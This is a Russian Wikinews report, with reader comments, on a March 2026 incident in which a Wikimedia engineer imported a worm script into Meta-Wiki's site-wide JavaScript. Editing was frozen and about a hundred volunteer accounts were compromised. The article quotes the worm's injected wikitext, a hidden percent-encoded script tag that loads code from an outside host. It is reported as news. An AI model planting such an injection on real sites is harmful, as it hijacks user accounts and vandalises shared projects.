Сотрудник фонда Викимедиа случайно активировал вредительский скрипт

5 марта 2026 года

Сегодня в районе 18:30 по московскому времени во всех проектах Фонда Викимедиа было остановлено внесение правок от любых участников. Это было вызвано атакой, проведённой в Мета-вики (веб-сайте, где обсуждаются все глобальные события в проектах Фонда).

Причиной атаки стали неосторожные действия сотрудника организации под никнеймом SBassett, штатного инженера по безопасности. В этот день сотрудник, не вносивший правки в Meta-Wiki около полугода, начал вносить изменения в страницу, которой настраивается внешний вид сайта во всех проектах: в алфавитном порядке массово импортировались (вероятно, с целью тестирования) чужие личные JavaScript-страницы из разных вики-проектов, включая испанскую, японскую и русскую Википедии.

По мере правок в алфавитный список был внесён скрипт участника Ololoshka562. В ту же минуту от лица сотрудника Фонда были кардинально отредактированы общие настройки сайта, и в течение следующих нескольких десятков минут были взломаны около сотни аккаунтов вики-волонтёров. От их лица на случайные страницы стал добавляться вики-код, добавляющий несуществующую картинку дятла.

[[File:Woodpecker10.jpg|5000px]]<br> <span style="display: none;">[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E| </span>

На момент написания статьи база данных всё ещё заблокирована, страницы остаются испорченными, но внос вирусного скрипта был откачен.

Оригинальный скрипт был загружен участником (вероятно, этот аккаунт был чьим-то дополнительным) ещё в 2024 году. Какого-либо вклада в статьи у учётной записи не было, за исключением попытки написания статьи под любопытным наименованием «Упячкоид».

Атака, совершённая сегодня, в точности повторяет ту, что была совершена в вики-проектах (не входящих в число проектов Фонда Викимедиа) «Циклопедия» и «Викиреальность» в феврале 2023 года. Последствия атаки оказались болезненными для этих сайтов — в Циклопедии последовали экстренные работы с движком, а «Викиреальность» до сих пор недоступна для редактирования после взлома. Именно атаковавший Циклопедию вирус был взят участником Ololoshka562 и слегка модифицирован.

На данный момент аккаунт участника, хранившего вредоносный код, бессрочно заблокирован в русской Википедии, а аккаунт загрузившего скрипт сотрудника подвергался 5 марта глобальному отключению.

В районе 20:08 по МСК возможность редактирования была возвращена.

На следующий день Фонд Викимедиа выпустил официальное заявление.

Эту статью написал Таёжный лес специально для Русских Викиновостей. Она содержит ранее не публиковавшиеся материалы или исследования, источником которых является сам автор. Вы можете свободно без согласования и выплаты вознаграждения копировать, распространять и изменять эту статью в любых целях, включая коммерческие, однако вы обязаны указать автора, источник и лицензию. Например, так: Таёжный лес; Викиновости; CC BY 2.5. Вы также должны обозначить изменения, если таковые были сделаны. Лицензии изображений уточняйте на их страницах на Викискладе.

Пожалуйста, прочтите правила общения и оформления реплик на портале Викиновости

Если вы хотите сообщить о проблеме в статье (например, фактическая ошибка и т. д.), пожалуйста, используйте обычную страницу обсуждения.

Комментарии на этой странице могут не соответствовать политике нейтральной точки зрения, однако, пожалуйста, придерживайтесь темы и попытайтесь избежать брани, оскорбительных или подстрекательных комментариев. Попробуйте написать такие комментарии, которые заставят задуматься, будут проницательными или спорными. Цивилизованная дискуссия и вежливый спор делают страницу комментариев дружелюбным местом. Пожалуйста, подумайте об этом.

Несколько советов по оформлению реплик:

• Новые темы начинайте, пожалуйста, снизу.
• Используйте символ звёздочки «*» в начале строки для начала новой темы. Далее пишите свой текст.
• Для ответа в начале строки укажите на одну звёздочку больше, чем в предыдущей реплике.
• Пожалуйста, подписывайте все свои сообщения, используя четыре тильды (~~~~). При предварительном просмотре и сохранении они будут автоматически заменены на ваше имя и дату.

Обращаем ваше внимание, что комментарии не предназначены для размещения ссылок на внешние ресурсы не по теме статьи, которые могут быть удалены или скрыты любым участником. Тем не менее, на странице комментариев вы можете сообщить о статьях в СМИ, которые ссылаются на эту заметку, а также о её обсуждении на сторонних ресурсах.

Добавить комментарий

• Я же говорил что Википедия разваливается. А Циклопедия не причем. Taratarussia (обсуждение) 10:18, 6 марта 2026 (UTC)
  • Это якобы развал Википедии ни при чём. Здесь скрипт виной, и ошибка инженера, а не "развал" Википедии. BilboBeggins (обсуждение) 12:34, 6 марта 2026 (UTC)
    • Почему, участники уходят, вдруг скрипт попутали, вдруг Циклопедия скоро достигнет своего юбилея 200. тысяч статей, слишком много совпадений. Taratarussia (обсуждение) 12:43, 6 марта 2026 (UTC)

      И при этом в Циклопедии так тухло, что её участники докатились до того, что бегают в ВН удовлетворять свои потребности в социализации. ~2026-10020-76 (обс.) 10:13, 8 марта 2026 (UTC)

Мне неясно, как тут произошел взлом. Скрипт с "basemetrika" подгрузился? Это из-за этой странной последовательности символов получилось загрузить внешний скрипт? А как же cors и всё такое? Gryllida (обсуждение) 10:39, 8 марта 2026 (UTC)

• "Взлом" (в кавычках, т.к. на самом деле кражи логинов и паролей не было) произошёл только из-за того, что этот скрипт загрузил себе участник с правом редактирования общесайтового JavaScript. Этот червь оттуда и разошёлся по подстраницам common.js различных участников.
  Попытка XSS хоть и нетривиальная (подстановка в фейковую ссылку на раздел страницы percent-encoded < и >), но не удалась. А домен basemetrika.ru специально создавался для атаки на Викиреальность и истёк в марте 2024, как видно по историческим данным Whois[1]. ~2026-14792-10 (обс.) 11:28, 8 марта 2026 (UTC)

• Во время атаки на Циклопедию я был жертвой этого скрипта. --ssr (обсуждение) 06:49, 14 марта 2026 (UTC)

  ЦП выдает все время Ошибку 503 Taratarussia (обсуждение) 13:36, 18 марта 2026 (UTC)

  Переадресуем этот вопрос user:Serebr --ssr (обсуждение) 04:37, 19 марта 2026 (UTC)

• А вот здесь подробный технический анализ произошедшего на английском языке. --ssr (обсуждение) 09:20, 14 марта 2026 (UTC)
  • Он предваряется неподробным анализом, в котором упомянуты Русские Викиновости и эта их статья. --ssr (обсуждение) 09:24, 14 марта 2026 (UTC)

	Имеете своё мнение на этот счёт?
Оставьте свой комментарий

	Поделитесь новостью с друзьями
Телеграм Фейсбук Твиттер ВК ОК ЖЖ